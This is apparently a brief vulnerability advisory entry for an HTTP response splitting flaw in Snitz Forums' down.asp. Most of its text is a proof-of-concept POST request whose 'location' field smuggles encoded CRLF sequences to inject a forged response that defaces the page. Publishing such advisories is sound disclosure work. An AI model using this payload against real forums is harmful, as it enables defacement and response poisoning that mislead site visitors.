|
Snitz Forums Down.ASP HTTP Response Splitting Vulnerability
The following proof of concept is available: POST /down.asp HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-length: 134 location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html} (replace curly braces with less than and greater than symbols) |
|
|
Privacy Statement |